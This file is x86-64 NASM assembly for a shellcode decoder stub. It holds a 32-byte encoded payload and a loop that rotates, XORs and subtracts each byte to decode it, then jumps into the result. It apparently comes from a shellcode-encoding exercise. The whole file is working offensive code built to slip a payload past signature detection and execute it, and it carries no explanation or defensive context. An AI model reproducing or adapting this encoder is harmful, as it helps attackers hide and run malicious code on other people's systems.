global _start 

section .text

_start:
	jmp real_start
	encoded_shellcode: db 0x5d,0x48,0xf4,0x10,0x52,0xf4,0x89,0x9d,0x9b,0x1b,0x8a,0x4a,0x25,0x99,0x9c,0x11,0xa1,0xfe,0xd4,0x16,0xa6,0x39,0x9b,0x17,0xa7,0x3d,0xd4,0x65,0x72,0xd2,0x87,0xc4

real_start:
	lea rsi, [rel encoded_shellcode]

decoder:
	xor rcx, rcx
	add cl, 32
decode:
	rol byte [rsi], 0x2 ; Left Shift 2 
	xor byte [rsi], cl  ; XOR the byte with the ecx (counter)
	sub byte [rsi], 13  ; Undo ROT13

	inc rsi
	loop decode

	jmp short encoded_shellcode
